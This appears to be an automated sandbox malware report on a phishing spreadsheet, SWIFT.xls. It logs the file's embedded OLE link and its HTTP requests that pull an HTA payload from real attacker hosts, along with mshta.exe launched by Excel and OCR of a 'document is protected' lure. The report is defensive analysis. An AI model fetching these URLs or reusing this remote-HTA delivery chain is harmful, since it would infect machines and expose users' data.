Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SWIFT.xls

Overview

General Information

Sample name:SWIFT.xls
Analysis ID:1578835
MD5:ed7928a72e06e8122d90ae9eb43736d6
SHA1:784a817af018202ee02bad8760c85b996942a38b
SHA256:e5d3f77e814bb0dfe7773205bf105a2b9d08f6f0245b7c1808e1c72748e180e9
Tags:exploitxlsuser-nfsec_pl
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Microsoft Office drops suspicious files
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 1812 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 5664 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 6716 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
    • Acrobat.exe (PID: 1708 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" -Embedding MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
  • EXCEL.EXE (PID: 7104 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\SWIFT.xls" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 1812, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mniscreenthinkinggoodforentiretimegoodfotbusubessthings[1].hta
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 1812, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 5664, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 14.103.79.10, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 1812, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49811
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49811, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 1812, Protocol: tcp, SourceIp: 14.103.79.10, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: SWIFT.xlsVirustotal: Detection: 25%Perma Link
Source: SWIFT.xlsReversingLabs: Detection: 26%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.5:49811 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: s.deemos.com
Source: global trafficTCP traffic: 192.168.2.5:49811 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: global trafficTCP traffic: 192.168.2.5:49811 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49811 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49811 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49811 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49811 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49811 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49811 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49811 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49811 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49811 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.5:49811
Source: global trafficTCP traffic: 192.168.2.5:49811 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49811 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.5:49811
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.5:49811
Source: global trafficTCP traffic: 192.168.2.5:49811 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49811 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.5:49811
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.5:49811
Source: global trafficTCP traffic: 192.168.2.5:49811 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49811 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.5:49811
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.5:49811
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.5:49811
Source: global trafficTCP traffic: 192.168.2.5:49811 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.5:49811 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.5:49811
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: global trafficTCP traffic: 57.129.55.225:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 57.129.55.225:80
Source: excel.exeMemory has grown: Private usage: 2MB later: 125MB
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: global trafficHTTP traffic detected: GET /lqSa1Aoh?&linen=frightened&trumpet HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /225/enn/mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownTCP traffic detected without corresponding DNS query: 57.129.55.225
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /lqSa1Aoh?&linen=frightened&trumpet HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /225/enn/mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 57.129.55.225
Source: global trafficDNS traffic detected: DNS query: s.deemos.com
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: SWIFT.xls, B833F2D7.emf.0.dr, 1DA485C4.emf.0.dr, 6AB36EAE.emf.0.dr, 96874680.emf.11.dr, 52C65A13.emf.0.dr, 477FA321.emf.0.dr, C1710E42.emf.0.dr, 6E440000.0.dr, 5691B099.emf.0.drString found in binary or memory: http://www.wowform.com
Source: SWIFT.xls, 6E440000.0.drString found in binary or memory: https://s.deemos.com/lqSa1Aoh?&linen=fri
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownHTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.5:49811 version: TLS 1.2

System Summary

barindex
Source: screenshotOCR: document is protected have 3 p dick ACRFEVRTGL BJZFPPV.APT GRX BJZFPPV.'APT BJZFPPV.APT KLIZ! 2 3 se
Source: screenshotOCR: document is protected have 3 p dick ACRFEVRTGL BJZFPPV.APT GRX BJZFPPV.'APT BJZFPPV.APT KLIZ! 2 3 se
Source: screenshotOCR: document is protected 3 p dick Or&r C 1 Desch ption Of Product 1 Descri ption Of Prcoct 2 2 3 sets p
Source: screenshotOCR: document is protected 3 p dick Or&r C 1 Desch ption Of Product 1 Descri ption Of Prcoct 2 2 3 sets p
Source: screenshotOCR: document is protected lcm2 Descripti lcm258 Descripti Qty l_k-its sets thit 42450 23.22600 Rice CRE
Source: screenshotOCR: document is protected CD the d Qty 2 3 sets pcs S23226_m 30'000.oo 3'000.oo 3'160.oo 3'000.oo 3'400.
Source: screenshotOCR: document is protected ttu d (i) $2 CD 2 3 sets pcs S23226_m 30'000.oo 3'000.oo 3'160.oo 3'000.oo 3'4
Source: screenshotOCR: document is protected ttu d (i) $2 CD 2 3 sets pcs S23226_m 30'000.oo 3'000.oo 3'160.oo 3'000.oo 3'4
Source: SWIFT.xlsOLE: Microsoft Excel 2007+
Source: 6E440000.0.drOLE: Microsoft Excel 2007+
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mniscreenthinkinggoodforentiretimegoodfotbusubessthings[1].htaJump to behavior
Source: SWIFT.xlsStream path 'MBd006D439F/\x1Ole' : https://s.deemos.com/lqSa1Aoh?&linen=frightened&trumpetw1h_xA=cAqHv.uzUqGJGExMrwr0C189bJ8UxUrTSRsvVXoyB6u2P8khUsj3kZjszVQATKdfwBGnCZ97z8Zc264Ud6YN6Z0LbeNJy3iAuOTvym2XXgObYQbDZLezhLoVDJCW9M6N4jk6UdrSdj9DqFB6c3dVBMuggpH8HEZBLT8mGhsKLsKAn8obIIdPxMDiR6wZalIppgtRVhZB6QmMwlTiU2M595Vlpnbd3_\oV8'GV5
Source: 6E440000.0.drStream path 'MBD006D439F/\x1Ole' : https://s.deemos.com/lqSa1Aoh?&linen=frightened&trumpetw1h_xA=cAqHv.uzUqGJGExMrwr0C189bJ8UxUrTSRsvVXoyB6u2P8khUsj3kZjszVQATKdfwBGnCZ97z8Zc264Ud6YN6Z0LbeNJy3iAuOTvym2XXgObYQbDZLezhLoVDJCW9M6N4jk6UdrSdj9DqFB6c3dVBMuggpH8HEZBLT8mGhsKLsKAn8obIIdPxMDiR6wZalIppgtRVhZB6QmMwlTiU2M595Vlpnbd3_\oV8'GV5
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal76.expl.winXLS@8/31@1/2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\C1710E42.emfJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{5D006A8F-8CE3-4E17-938B-10A3E65C5780} - OProcSessId.datJump to behavior
Source: SWIFT.xlsOLE indicator, Workbook stream: true
Source: 6E440000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: SWIFT.xlsVirustotal: Detection: 25%
Source: SWIFT.xlsReversingLabs: Detection: 26%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\SWIFT.xls"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: SWIFT.xlsInitial sample: OLE indicators vbamacros = False
Source: SWIFT.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
